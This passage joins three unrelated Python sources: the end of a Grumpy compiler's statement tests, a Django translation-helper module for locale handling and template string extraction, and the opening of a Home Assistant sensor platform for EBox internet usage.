          print 'foo'
        else:
          print 'bar'""")))

  def testForElseBreakNotNested(self):
    # BUG FIX: this test was a copy of the 'continue' case below; a 'break'
    # in a for-else block is not inside the loop and must be rejected too.
    self.assertRaisesRegexp(
        util.ParseError, "'break' not in loop",
        _ParseAndVisit, 'for i in (1,):\n  pass\nelse:\n  break')

  def testForElseContinueNotNested(self):
    self.assertRaisesRegexp(
        util.ParseError, "'continue' not in loop",
        _ParseAndVisit, 'for i in (1,):\n  pass\nelse:\n  continue')

  def testFunctionDecorator(self):
    self.assertEqual((0, '<b>foo</b>\n'), _GrumpRun(textwrap.dedent("""\
        def bold(fn):
          return lambda: '<b>' + fn() + '</b>'
        @bold
        def foo():
          return 'foo'
        print foo()""")))

  def testFunctionDecoratorWithArg(self):
    self.assertEqual((0, '<b id=red>foo</b>\n'), _GrumpRun(textwrap.dedent("""\
        def tag(name):
          def bold(fn):
            return lambda: '<b id=' + name + '>' + fn() + '</b>'
          return bold
        @tag('red')
        def foo():
          return 'foo'
        print foo()""")))

  def testFunctionDef(self):
    self.assertEqual((0, 'bar baz\n'), _GrumpRun(textwrap.dedent("""\
        def foo(a, b):
          print a, b
        foo('bar', 'baz')""")))

  def testFunctionDefGenerator(self):
    self.assertEqual((0, "['foo', 'bar']\n"), _GrumpRun(textwrap.dedent("""\
        def gen():
          yield 'foo'
          yield 'bar'
        print list(gen())""")))

  def testFunctionDefGeneratorReturnValue(self):
    self.assertRaisesRegexp(
        util.ParseError, 'returning a value in a generator function',
        _ParseAndVisit, 'def foo():\n  yield 1\n  return 2')

  def testFunctionDefLocal(self):
    self.assertEqual((0, 'baz\n'), _GrumpRun(textwrap.dedent("""\
        def foo():
          def bar():
            print 'baz'
          bar()
        foo()""")))

  def testIf(self):
    self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
        if 123:
          print 'foo'
        if '':
          print 'bar'""")))

  def testIfElif(self):
    self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
        if True:
          print 'foo'
        elif False:
          print 'bar'
        if False:
          print 'foo'
        elif True:
          print 'bar'""")))

  def testIfElse(self):
    self.assertEqual((0, 'foo\nbar\n'), _GrumpRun(textwrap.dedent("""\
        if True:
          print 'foo'
        else:
          print 'bar'
        if False:
          print 'foo'
        else:
          print 'bar'""")))

  def testImport(self):
    self.assertEqual((0, "<type 'dict'>\n"), _GrumpRun(textwrap.dedent("""\
        import sys
        print type(sys.modules)""")))

  def testImportFutureLateRaises(self):
    regexp = 'from __future__ imports must occur at the beginning of the file'
    self.assertRaisesRegexp(util.ImportError, regexp, _ParseAndVisit,
                            'foo = bar\nfrom __future__ import print_function')

  def testFutureUnicodeLiterals(self):
    want = "u'foo'\n"
    self.assertEqual((0, want), _GrumpRun(textwrap.dedent("""\
        from __future__ import unicode_literals
        print repr('foo')""")))

  def testImportMember(self):
    self.assertEqual((0, "<type 'dict'>\n"), _GrumpRun(textwrap.dedent("""\
        from sys import modules
        print type(modules)""")))

  def testImportConflictingPackage(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        import time
        from "__go__/time" import Now""")))

  def testImportNative(self):
    self.assertEqual((0, '1 1000000000\n'), _GrumpRun(textwrap.dedent("""\
        from "__go__/time" import Nanosecond, Second
        print Nanosecond, Second""")))

  def testImportGrumpy(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        from "__go__/grumpy" import Assert
        Assert(__frame__(), True, 'bad')""")))

  def testImportNativeType(self):
    self.assertEqual((0, "<type 'Duration'>\n"), _GrumpRun(textwrap.dedent("""\
        from "__go__/time" import Duration
        print Duration""")))

  def testImportWildcardMemberRaises(self):
    regexp = 'wildcard member import is not implemented'
    self.assertRaisesRegexp(util.ImportError, regexp, _ParseAndVisit,
                            'from foo import *')
    self.assertRaisesRegexp(util.ImportError, regexp, _ParseAndVisit,
                            'from "__go__/foo" import *')

  def testPrintStatement(self):
    self.assertEqual((0, 'abc 123\nfoo bar\n'), _GrumpRun(textwrap.dedent("""\
        print 'abc',
        print '123'
        print 'foo', 'bar'""")))

  def testPrintFunction(self):
    want = "abc\n123\nabc 123\nabcx123\nabc 123 "
    self.assertEqual((0, want), _GrumpRun(textwrap.dedent("""\
        "module docstring is ok to proceed __future__"
        from __future__ import print_function
        print('abc')
        print(123)
        print('abc', 123)
        print('abc', 123, sep='x')
        print('abc', 123, end=' ')""")))

  def testRaiseExitStatus(self):
    self.assertEqual(1, _GrumpRun('raise Exception')[0])

  def testRaiseInstance(self):
    self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
        try:
          raise RuntimeError('foo')
          print 'bad'
        except RuntimeError as e:
          print e""")))

  def testRaiseTypeAndArg(self):
    self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
        try:
          raise KeyError('foo')
          print 'bad'
        except KeyError as e:
          print e""")))

  def testRaiseAgain(self):
    self.assertEqual((0, 'foo\n'), _GrumpRun(textwrap.dedent("""\
        try:
          try:
            raise AssertionError('foo')
          except AssertionError:
            raise
        except Exception as e:
          print e""")))

  def testRaiseTraceback(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        import sys
        try:
          try:
            raise Exception
          except:
            e, _, tb = sys.exc_info()
            raise e, None, tb
        except:
          e2, _, tb2 = sys.exc_info()
        assert e is e2
        assert tb is tb2""")))

  def testReturn(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        def foo():
          return 'bar'
        print foo()""")))

  def testTryBareExcept(self):
    self.assertEqual((0, ''), _GrumpRun(textwrap.dedent("""\
        try:
          raise AssertionError
        except:
          pass""")))

  def testTryElse(self):
    self.assertEqual((0, 'foo baz\n'), _GrumpRun(textwrap.dedent("""\
        try:
          print 'foo',
        except:
          print 'bar'
        else:
          print 'baz'""")))

  def testTryMultipleExcept(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        try:
          raise AssertionError
        except RuntimeError:
          print 'foo'
        except AssertionError:
          print 'bar'
        except:
          print 'baz'""")))

  def testTryFinally(self):
    result = _GrumpRun(textwrap.dedent("""\
        try:
          print 'foo',
        finally:
          print 'bar'
        try:
          print 'foo',
          raise Exception
        finally:
          print 'bar'"""))
    self.assertEqual(1, result[0])
    self.assertIn('foo bar\nfoo bar\n', result[1])
    self.assertIn('Exception\n', result[1])

  def testWhile(self):
    self.assertEqual((0, '2\n1\n'), _GrumpRun(textwrap.dedent("""\
        i = 2
        while i:
          print i
          i -= 1""")))

  def testWhileElse(self):
    self.assertEqual((0, 'bar\n'), _GrumpRun(textwrap.dedent("""\
        while False:
          print 'foo'
        else:
          print 'bar'""")))

  def testWith(self):
    self.assertEqual((0, 'enter\n1\nexit\nenter\n2\nexit\n3\n'),
                     _GrumpRun(textwrap.dedent("""\
        class ContextManager(object):
          def __enter__(self):
            print "enter"

          def __exit__(self, exc_type, value, traceback):
            print "exit"

        a = ContextManager()

        with a:
          print 1

        try:
          with a:
            print 2
            raise RuntimeError
        except RuntimeError:
          print 3
        """)))

  def testWithAs(self):
    self.assertEqual((0, '1 2 3\n'),
                     _GrumpRun(textwrap.dedent("""\
        class ContextManager(object):
          def __enter__(self):
            return (1, (2, 3))
          def __exit__(self, *args):
            pass
        with ContextManager() as [x, (y, z)]:
          print x, y, z
        """)))

  def testWriteExceptDispatcherBareExcept(self):
    visitor = stmt.StatementVisitor(_MakeModuleBlock())
    handlers = [ast.ExceptHandler(type=ast.Name(id='foo')),
                ast.ExceptHandler(type=None)]
    self.assertEqual(visitor._write_except_dispatcher(  # pylint: disable=protected-access
        'exc', 'tb', handlers), [1, 2])
    expected = re.compile(r'ResolveGlobal\(.*foo.*\bIsInstance\(.*'
                          r'goto Label1.*goto Label2', re.DOTALL)
    self.assertRegexpMatches(visitor.writer.getvalue(), expected)

  def testWriteExceptDispatcherBareExceptionNotLast(self):
    visitor = stmt.StatementVisitor(_MakeModuleBlock())
    handlers = [ast.ExceptHandler(type=None),
                ast.ExceptHandler(type=ast.Name(id='foo'))]
    self.assertRaisesRegexp(util.ParseError, r"default 'except:' must be last",
                            visitor._write_except_dispatcher,  # pylint: disable=protected-access
                            'exc', 'tb', handlers)

  def testWriteExceptDispatcherMultipleExcept(self):
    visitor = stmt.StatementVisitor(_MakeModuleBlock())
    handlers = [ast.ExceptHandler(type=ast.Name(id='foo')),
                ast.ExceptHandler(type=ast.Name(id='bar'))]
    self.assertEqual(visitor._write_except_dispatcher(  # pylint: disable=protected-access
        'exc', 'tb', handlers), [1, 2])
    expected = re.compile(
        r'ResolveGlobal\(.*foo.*\bif .*\bIsInstance\(.*\{.*goto Label1.*'
        r'ResolveGlobal\(.*bar.*\bif .*\bIsInstance\(.*\{.*goto Label2.*'
        r'\bRaise\(exc\.ToObject\(\), nil, tb\.ToObject\(\)\)', re.DOTALL)
    self.assertRegexpMatches(visitor.writer.getvalue(), expected)


def _MakeModuleBlock():
  return block.ModuleBlock(None, '__main__', '<test>', '',
                           imputil.FutureFeatures())


def _ParseAndVisit(source):
  mod = pythonparser.parse(source)
  _, future_features = imputil.parse_future_features(mod)
  importer = imputil.Importer(None, 'foo', 'foo.py', False)
  b = block.ModuleBlock(importer, '__main__', '<test>',
                        source, future_features)
  visitor = stmt.StatementVisitor(b)
  visitor.visit(mod)
  return visitor


def _GrumpRun(cmd):
  """Run cmd through the grumpy toolchain; return (returncode, output)."""
  proc = subprocess.Popen(['grumpy', 'run'], stdin=subprocess.PIPE,
                          stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
  # stderr is folded into stdout so callers can assert on a single stream.
  output, _ = proc.communicate(cmd)
  return proc.returncode, output


# Entry point: run through the shard_test harness (presumably so the suite
# can be split across shards -- see grumpy_tools.compiler.shard_test).
if __name__ == '__main__':
  shard_test.main()

"""Translation helper functions."""

import locale
import os
import re
import sys
import gettext as gettext_module
from cStringIO import StringIO

from django.utils.importlib import import_module
from django.utils.safestring import mark_safe, SafeData
from django.utils.thread_support import currentThread

# Translations are cached in a dictionary for every language+app tuple.
# The active translations are stored by threadid to make them thread local.
_translations = {}
_active = {}

# The default translation is based on the settings file.
_default = None

# This is a cache for normalized accept-header languages to prevent multiple
# file lookups when checking the same locale on repeated requests.
_accepted = {}

# Format of Accept-Language header values. From RFC 2616, section 14.4 and 3.9.
# Group 1 is the language range, group 2 the optional quality value.
# BUG FIX: the "1" alternative used an unescaped dot ("1(?:.0{,3})?"), which
# matched any character and accepted garbage like "q=1x0"; it is now "\.".
accept_language_re = re.compile(r'''
        ([A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*|\*)   # "en", "en-au", "x-y-z", "*"
        (?:;q=(0(?:\.\d{,3})?|1(?:\.0{,3})?))?  # Optional "q=1.00", "q=0.8"
        (?:\s*,\s*|$)                            # Multiple accepts per header.
        ''', re.VERBOSE)

def to_locale(language, to_lower=False):
    """
    Turns a language name (en-us) into a locale name (en_US). If 'to_lower' is
    True, the last component is lower-cased (en_us).
    """
    head, sep, tail = language.partition('-')
    if not sep:
        # No dash: the whole name is a single lower-cased component.
        return language.lower()
    if to_lower:
        tail = tail.lower()
    else:
        tail = tail.upper()
    return head.lower() + '_' + tail

def to_language(locale):
    """Turns a locale name (en_US) into a language name (en-us)."""
    head, sep, tail = locale.partition('_')
    if not sep:
        return locale.lower()
    return head.lower() + '-' + tail.lower()

class DjangoTranslation(gettext_module.GNUTranslations):
    """
    GNUTranslations subclass that fixes the output charset to UTF-8 and
    tracks which language it was built for. Django uses a defined
    DEFAULT_CHARSET as the output charset on Python 2.4. With Python 2.3,
    use DjangoTranslation23.
    """
    def __init__(self, *args, **kw):
        # NOTE(review): settings is imported but not referenced here;
        # confirm whether the import is kept deliberately before removing.
        from django.conf import settings
        gettext_module.GNUTranslations.__init__(self, *args, **kw)
        # set_output_charset() only exists on Python 2.4+; on older versions
        # the output charset is simply the translation file's charset.
        try:
            self.set_output_charset('utf-8')
        except AttributeError:
            pass
        self.django_output_charset = 'utf-8'
        self.__language = '??'

    def merge(self, other):
        # Fold the other catalog into ours; entries from 'other' win.
        self._catalog.update(other._catalog)

    def set_language(self, language):
        self.__language = language

    def language(self):
        return self.__language

    def __repr__(self):
        return "<DjangoTranslation lang:%s>" % self.language()

class DjangoTranslation23(DjangoTranslation):
    """
    Compatibility subclass used only on Python 2.3, which lacks
    set_output_charset on translation objects. It re-encodes the unicode
    results of ugettext/ungettext into the configured output charset so the
    byte-string API behaves the same as on Python 2.4.

    With a full switch to Python 2.4, this can be removed from the source.
    """
    def gettext(self, msgid):
        # Translate via the unicode variant, then encode to the output charset.
        return self.ugettext(msgid).encode(self.django_output_charset)

    def ngettext(self, msgid1, msgid2, n):
        return self.ungettext(msgid1, msgid2, n).encode(self.django_output_charset)

def translation(language):
    """
    Returns a translation object.

    This translation object will be constructed out of multiple GNUTranslations
    objects by merging their catalogs. It will construct a object for the
    requested language and add a fallback to the default language, if it's
    different from the requested language.
    """
    global _translations

    # Fast path: reuse a previously built (merged) translation object.
    t = _translations.get(language, None)
    if t is not None:
        return t

    from django.conf import settings

    # set up the right translation class
    klass = DjangoTranslation
    if sys.version_info < (2, 4):
        klass = DjangoTranslation23

    # Locale directory next to the package that contains the settings module
    # (i.e. Django's own global catalogs).
    globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')

    if settings.SETTINGS_MODULE is not None:
        # The project's locale directory, derived from the root package of
        # SETTINGS_MODULE.
        parts = settings.SETTINGS_MODULE.split('.')
        project = import_module(parts[0])
        projectpath = os.path.join(os.path.dirname(project.__file__), 'locale')
    else:
        projectpath = None

    def _fetch(lang, fallback=None):
        # Builds (and caches in _translations) the merged translation for one
        # language code. Merge order: global catalog, then LOCALE_PATHS, then
        # the project catalog, then each installed app; merge() lets later
        # catalogs override earlier entries.

        global _translations

        loc = to_locale(lang)

        res = _translations.get(lang, None)
        if res is not None:
            return res

        def _translation(path):
            # Load a single 'django' catalog from path, or None when the MO
            # file is missing. (Python 2 except syntax; 'e' is unused.)
            try:
                t = gettext_module.translation('django', path, [loc], klass)
                t.set_language(lang)
                return t
            except IOError, e:
                return None

        res = _translation(globalpath)

        # We want to ensure that, for example,  "en-gb" and "en-us" don't share
        # the same translation object (thus, merging en-us with a local update
        # doesn't affect en-gb), even though they will both use the core "en"
        # translation. So we have to subvert Python's internal gettext caching.
        # NOTE(review): res may still be None here when the global catalog is
        # missing, in which case the copies below would raise AttributeError
        # -- confirm this path cannot be hit.
        base_lang = lambda x: x.split('-', 1)[0]
        if base_lang(lang) in [base_lang(trans) for trans in _translations]:
            res._info = res._info.copy()
            res._catalog = res._catalog.copy()

        def _merge(path):
            # Merge the catalog at path into res; adopt it outright when res
            # is still None.
            t = _translation(path)
            if t is not None:
                if res is None:
                    return t
                else:
                    res.merge(t)
            return res

        for localepath in settings.LOCALE_PATHS:
            if os.path.isdir(localepath):
                res = _merge(localepath)

        if projectpath and os.path.isdir(projectpath):
            res = _merge(projectpath)

        for appname in settings.INSTALLED_APPS:
            app = import_module(appname)
            apppath = os.path.join(os.path.dirname(app.__file__), 'locale')

            if os.path.isdir(apppath):
                res = _merge(apppath)

        if res is None:
            # No catalog found anywhere: fall back to the default-language
            # translation, or to an inert NullTranslations. Note the
            # NullTranslations result is deliberately not cached.
            if fallback is not None:
                res = fallback
            else:
                return gettext_module.NullTranslations()
        _translations[lang] = res
        return res

    default_translation = _fetch(settings.LANGUAGE_CODE)
    current_translation = _fetch(language, fallback=default_translation)

    return current_translation

def activate(language):
    """
    Installs the translation object for 'language' as the active translation
    for the current thread.
    """
    t = translation(language)
    _active[currentThread()] = t

def deactivate():
    """
    Removes the current thread's active translation, so later _ calls fall
    back to the default translation object again.
    """
    global _active
    # pop() with a default replaces the membership-test-then-delete dance.
    _active.pop(currentThread(), None)

def deactivate_all():
    """
    Installs a NullTranslations() instance as the active translation, so that
    delayed translations come back as their original strings.
    """
    thread = currentThread()
    _active[thread] = gettext_module.NullTranslations()

def get_language():
    """Returns the currently selected language."""
    current = _active.get(currentThread(), None)
    try:
        if current is not None:
            return to_language(current.language())
    except AttributeError:
        # e.g. a translation object without language(); fall through.
        pass
    # No usable translation object: report the configured default language.
    from django.conf import settings
    return settings.LANGUAGE_CODE

def get_language_bidi():
    """
    Returns selected language's BiDi layout:
    False = left-to-right layout, True = right-to-left layout.
    """
    from django.conf import settings

    # Only the base language (before any dash) decides directionality.
    lang = get_language()
    return lang.split('-')[0] in settings.LANGUAGES_BIDI

def catalog():
    """
    Returns the currently active catalog so callers can inspect or modify the
    whole message catalog rather than translating a single string.
    """
    global _default, _active
    active = _active.get(currentThread(), None)
    if active is not None:
        return active
    # Nothing activated on this thread: lazily build and cache the default.
    if _default is None:
        from django.conf import settings
        _default = translation(settings.LANGUAGE_CODE)
    return _default

def do_translate(message, translation_function):
    """
    Translates 'message' with the named 'translation_function' (gettext or
    ugettext) of the current thread's translation object, falling back to the
    lazily created default translation. Safe strings stay safe.
    """
    global _default, _active
    t = _active.get(currentThread(), None)
    if t is None:
        if _default is None:
            from django.conf import settings
            _default = translation(settings.LANGUAGE_CODE)
        t = _default
    result = getattr(t, translation_function)(message)
    if isinstance(message, SafeData):
        # Preserve the safe-string marking across translation.
        result = mark_safe(result)
    return result

def gettext(message):
    """Translates message via the active catalog, returning a bytestring."""
    return do_translate(message, 'gettext')

def ugettext(message):
    """Translates message via the active catalog, returning unicode."""
    return do_translate(message, 'ugettext')

def gettext_noop(message):
    """
    Marks message for translation without translating it now. Useful for
    strings kept in global variables that must stay in the base language
    (e.g. because they are used externally) and get translated later.
    """
    return message

def do_ntranslate(singular, plural, number, translation_function):
    # Pick the thread's active translation, or fall back to the lazily
    # created default, then dispatch to its ngettext/ungettext method.
    global _default, _active

    t = _active.get(currentThread(), None)
    if t is None:
        if _default is None:
            from django.conf import settings
            _default = translation(settings.LANGUAGE_CODE)
        t = _default
    return getattr(t, translation_function)(singular, plural, number)

def ngettext(singular, plural, number):
    """
    Returns a UTF-8 bytestring: the translation of singular or plural,
    chosen by number.
    """
    return do_ntranslate(singular, plural, number, 'ngettext')

def ungettext(singular, plural, number):
    """
    Returns a unicode string: the translation of singular or plural,
    chosen by number.
    """
    return do_ntranslate(singular, plural, number, 'ungettext')

def check_for_language(lang_code):
    """
    Checks whether there is a global language file for the given language
    code. This is used to decide whether a user-provided language is
    available. This is only used for language codes from either the cookies or
    session.

    Returns True when a 'django' message catalog for lang_code exists in the
    global locale directory, False otherwise.
    """
    from django.conf import settings
    globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
    # gettext_module.find() returns None when no catalog exists; map that
    # directly to a boolean instead of the verbose if/else.
    return gettext_module.find('django', globalpath, [to_locale(lang_code)]) is not None

def get_language_from_request(request):
    """
    Analyzes the request to find what language the user wants the system to
    show. Only languages listed in settings.LANGUAGES are taken into account.
    If the user requests a sublanguage where we have a main language, we send
    out the main language.

    Lookup order: session, then cookie, then the Accept-Language header,
    then settings.LANGUAGE_CODE.
    """
    global _accepted
    from django.conf import settings
    # Global locale directory (used below for the manual MO-file lookup).
    globalpath = os.path.join(os.path.dirname(sys.modules[settings.__module__].__file__), 'locale')
    supported = dict(settings.LANGUAGES)

    # 1) Explicit choice stored in the session.
    if hasattr(request, 'session'):
        lang_code = request.session.get('django_language', None)
        # NOTE(review): the membership test runs before the None check; a
        # None key simply fails the lookup, so the order is harmless but odd.
        if lang_code in supported and lang_code is not None and check_for_language(lang_code):
            return lang_code

    # 2) Explicit choice stored in the language cookie.
    lang_code = request.COOKIES.get(settings.LANGUAGE_COOKIE_NAME)
    if lang_code and lang_code in supported and check_for_language(lang_code):
        return lang_code

    # 3) Browser preference from the Accept-Language header (presumably in
    # quality order as produced by parse_accept_lang_header -- confirm).
    accept = request.META.get('HTTP_ACCEPT_LANGUAGE', '')
    for accept_lang, unused in parse_accept_lang_header(accept):
        if accept_lang == '*':
            break

        # We have a very restricted form for our language files (no encoding
        # specifier, since they all must be UTF-8 and only one possible
        # language each time. So we avoid the overhead of gettext.find() and
        # work out the MO file manually.

        # 'normalized' is the root name of the locale in POSIX format (which is
        # the format used for the directories holding the MO files).
        normalized = locale.locale_alias.get(to_locale(accept_lang, True))
        if not normalized:
            continue
        # Remove the default encoding from locale_alias.
        normalized = normalized.split('.')[0]

        if normalized in _accepted:
            # We've seen this locale before and have an MO file for it, so no
            # need to check again.
            return _accepted[normalized]

        # Try the exact language first, then its base language (en-gb -> en).
        # NOTE(review): assumes settings.LANGUAGES keys are lower-case, since
        # lang.lower() is tested against them -- confirm.
        for lang, dirname in ((accept_lang, normalized),
                (accept_lang.split('-')[0], normalized.split('_')[0])):
            if lang.lower() not in supported:
                continue
            langfile = os.path.join(globalpath, dirname, 'LC_MESSAGES',
                    'django.mo')
            if os.path.exists(langfile):
                # Cache the hit so repeated requests skip the file check.
                _accepted[normalized] = lang
                return lang

    # 4) Nothing usable: fall back to the configured default.
    return settings.LANGUAGE_CODE

def get_date_formats():
    """
    Checks whether translation files provide a translation for some technical
    message ID to store date and time formats. If it doesn't contain one, the
    formats provided in the settings will be used.
    """
    from django.conf import settings
    resolved = []
    for format_name in ('DATE_FORMAT', 'DATETIME_FORMAT', 'TIME_FORMAT'):
        translated = ugettext(format_name)
        if translated == format_name:
            # No translation supplied the format; fall back to settings.
            translated = getattr(settings, format_name)
        resolved.append(translated)
    return tuple(resolved)

def get_partial_date_formats():
    """
    Checks whether translation files provide a translation for some technical
    message ID to store partial date formats. If it doesn't contain one, the
    formats provided in the settings will be used.
    """
    from django.conf import settings
    resolved = []
    for format_name in ('YEAR_MONTH_FORMAT', 'MONTH_DAY_FORMAT'):
        translated = ugettext(format_name)
        if translated == format_name:
            # No translation supplied the format; fall back to settings.
            translated = getattr(settings, format_name)
        resolved.append(translated)
    return tuple(resolved)

# Matches any single non-whitespace character.
dot_re = re.compile(r'\S')
def blankout(src, char):
    """
    Replaces every non-whitespace character in ``src`` with ``char``,
    preserving the whitespace layout. Used in the templatize function.
    """
    return dot_re.sub(char, src)

# Regexes used by templatize() to recognize Django translation constructs.
# Matches an inline {% trans "literal" %} tag; group 1 is the quoted string.
inline_re = re.compile(r"""^\s*trans\s+((?:".*?")|(?:'.*?'))\s*""")
# Matches an opening {% blocktrans %} tag, with or without arguments.
block_re = re.compile(r"""^\s*blocktrans(?:\s+|$)""")
# Matches the closing {% endblocktrans %} tag.
endblock_re = re.compile(r"""^\s*endblocktrans$""")
# Matches the {% plural %} separator inside a blocktrans block.
plural_re = re.compile(r"""^\s*plural$""")
# Matches _("literal") constant strings inside tags and variable expressions.
constant_re = re.compile(r"""_\(((?:".*?")|(?:'.*?'))\)""")

def templatize(src):
    """
    Turns a Django template into something that is understood by xgettext. It
    does so by translating the Django translation tags into standard gettext
    function invocations.
    """
    from django.template import Lexer, TOKEN_TEXT, TOKEN_VAR, TOKEN_BLOCK
    out = StringIO()
    # State: are we inside a {% blocktrans %}...{% endblocktrans %} section,
    # and if so, past the {% plural %} separator?
    intrans = False
    inplural = False
    singular = []
    plural = []
    for t in Lexer(src, None).tokenize():
        if intrans:
            # Inside a blocktrans: accumulate message text until the
            # closing tag, then emit a gettext()/ngettext() call.
            if t.token_type == TOKEN_BLOCK:
                endbmatch = endblock_re.match(t.contents)
                pluralmatch = plural_re.match(t.contents)
                if endbmatch:
                    if inplural:
                        out.write(' ngettext(%r,%r,count) ' % (''.join(singular), ''.join(plural)))
                        # Blank out the original content so xgettext's line
                        # numbers still match the template source.
                        for part in singular:
                            out.write(blankout(part, 'S'))
                        for part in plural:
                            out.write(blankout(part, 'P'))
                    else:
                        out.write(' gettext(%r) ' % ''.join(singular))
                        for part in singular:
                            out.write(blankout(part, 'S'))
                    intrans = False
                    inplural = False
                    singular = []
                    plural = []
                elif pluralmatch:
                    inplural = True
                else:
                    raise SyntaxError("Translation blocks must not include other block tags: %s" % t.contents)
            elif t.token_type == TOKEN_VAR:
                # Template variables become %(name)s placeholders in the
                # extracted message.
                if inplural:
                    plural.append('%%(%s)s' % t.contents)
                else:
                    singular.append('%%(%s)s' % t.contents)
            elif t.token_type == TOKEN_TEXT:
                if inplural:
                    plural.append(t.contents)
                else:
                    singular.append(t.contents)
        else:
            # Outside any blocktrans: handle inline trans tags, blocktrans
            # openers, _() constants, and blank out everything else.
            if t.token_type == TOKEN_BLOCK:
                imatch = inline_re.match(t.contents)
                bmatch = block_re.match(t.contents)
                cmatches = constant_re.findall(t.contents)
                if imatch:
                    g = imatch.group(1)
                    # Strip the surrounding quotes from the message literal.
                    if g[0] == '"': g = g.strip('"')
                    elif g[0] == "'": g = g.strip("'")
                    out.write(' gettext(%r) ' % g)
                elif bmatch:
                    # _() constants in the blocktrans arguments themselves.
                    for fmatch in constant_re.findall(t.contents):
                        out.write(' _(%s) ' % fmatch)
                    intrans = True
                    inplural = False
                    singular = []
                    plural = []
                elif cmatches:
                    for cmatch in cmatches:
                        out.write(' _(%s) ' % cmatch)
                else:
                    out.write(blankout(t.contents, 'B'))
            elif t.token_type == TOKEN_VAR:
                # A variable token may start with an _() constant and carry
                # filters; filter arguments may themselves contain _().
                parts = t.contents.split('|')
                cmatch = constant_re.match(parts[0])
                if cmatch:
                    out.write(' _(%s) ' % cmatch.group(1))
                for p in parts[1:]:
                    if p.find(':_(') >= 0:
                        out.write(' %s ' % p.split(':',1)[1])
                    else:
                        out.write(blankout(p, 'F'))
            else:
                out.write(blankout(t.contents, 'X'))
    return out.getvalue()

def parse_accept_lang_header(lang_string):
    """
    Parses the lang_string, which is the body of an HTTP Accept-Language
    header, and returns a list of (lang, q-value), ordered by 'q' values.

    Any format errors in lang_string results in an empty list being returned.
    """
    result = []
    pieces = accept_language_re.split(lang_string)
    # A well-formed header leaves an empty trailing piece after splitting.
    if pieces[-1]:
        return []
    # The regex yields (separator, language, quality) triples.
    for i in range(0, len(pieces) - 1, 3):
        first, lang, priority = pieces[i : i + 3]
        if first:
            return []
        # Only an *absent* q-value defaults to 1.0. The previous
        # ``priority and float(priority) or 1.0`` idiom also promoted an
        # explicit "q=0" (meaning "not acceptable") to 1.0, because
        # float("0") is falsy.
        if priority:
            priority = float(priority)
        else:
            priority = 1.0
        result.append((lang, priority))
    # Stable, descending sort by q-value; entries with equal q keep their
    # header order. Replaces the Python-2-only cmp() comparator.
    result.sort(key=lambda pair: pair[1], reverse=True)
    return result

"""
Support for EBox.

Get data from 'My Usage Page' page: https://client.ebox.ca/myusage

For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.ebox/
"""
import logging
from datetime import timedelta

import voluptuous as vol

import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
    CONF_USERNAME,
    CONF_PASSWORD,
    CONF_NAME,
    CONF_MONITORED_VARIABLES,
)
from homeassistant.helpers.entity import Entity
from homeassistant.util import Throttle
from homeassistant.exceptions import PlatformNotReady


_LOGGER = logging.getLogger(__name__)

# Units of measurement for the sensors defined in SENSOR_TYPES.
GIGABITS = "Gb"
PRICE = "CAD"
DAYS = "days"
PERCENT = "%"

# Default prefix for sensor entity names.
DEFAULT_NAME = "EBox"

# HTTP timeout (seconds) handed to the pyebox client.
REQUESTS_TIMEOUT = 15
SCAN_INTERVAL = timedelta(minutes=15)
# Throttle window applied to EBoxData.async_update.
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=15)

# Sensor key -> [friendly name, unit of measurement, Material Design icon].
SENSOR_TYPES = {
    "usage": ["Usage", PERCENT, "mdi:percent"],
    "balance": ["Balance", PRICE, "mdi:square-inc-cash"],
    "limit": ["Data limit", GIGABITS, "mdi:download"],
    "days_left": ["Days left", DAYS, "mdi:calendar-today"],
    "before_offpeak_download": ["Download before offpeak", GIGABITS, "mdi:download"],
    "before_offpeak_upload": ["Upload before offpeak", GIGABITS, "mdi:upload"],
    "before_offpeak_total": ["Total before offpeak", GIGABITS, "mdi:download"],
    "offpeak_download": ["Offpeak download", GIGABITS, "mdi:download"],
    "offpeak_upload": ["Offpeak Upload", GIGABITS, "mdi:upload"],
    "offpeak_total": ["Offpeak Total", GIGABITS, "mdi:download"],
    "download": ["Download", GIGABITS, "mdi:download"],
    "upload": ["Upload", GIGABITS, "mdi:upload"],
    "total": ["Total", GIGABITS, "mdi:download"],
}

# Platform configuration: credentials are required, monitored variables must
# be a subset of SENSOR_TYPES keys.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_MONITORED_VARIABLES): vol.All(
            cv.ensure_list, [vol.In(SENSOR_TYPES)]
        ),
        vol.Required(CONF_USERNAME): cv.string,
        vol.Required(CONF_PASSWORD): cv.string,
        vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
    }
)


async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up the EBox sensor."""
    username = config.get(CONF_USERNAME)
    password = config.get(CONF_PASSWORD)
    name = config.get(CONF_NAME)

    httpsession = hass.helpers.aiohttp_client.async_get_clientsession()
    ebox_data = EBoxData(username, password, httpsession)

    from pyebox.client import PyEboxError

    # Fail fast on bad credentials so HA retries the platform setup later.
    try:
        await ebox_data.async_update()
    except PyEboxError as exp:
        _LOGGER.error("Failed login: %s", exp)
        raise PlatformNotReady

    entities = [
        EBoxSensor(ebox_data, variable, name)
        for variable in config[CONF_MONITORED_VARIABLES]
    ]
    async_add_entities(entities, True)


class EBoxSensor(Entity):
    """Implementation of a EBox sensor."""

    def __init__(self, ebox_data, sensor_type, name):
        """Initialize the sensor."""
        self.client_name = name
        self.type = sensor_type
        # Unpack the [name, unit, icon] triple for this sensor type.
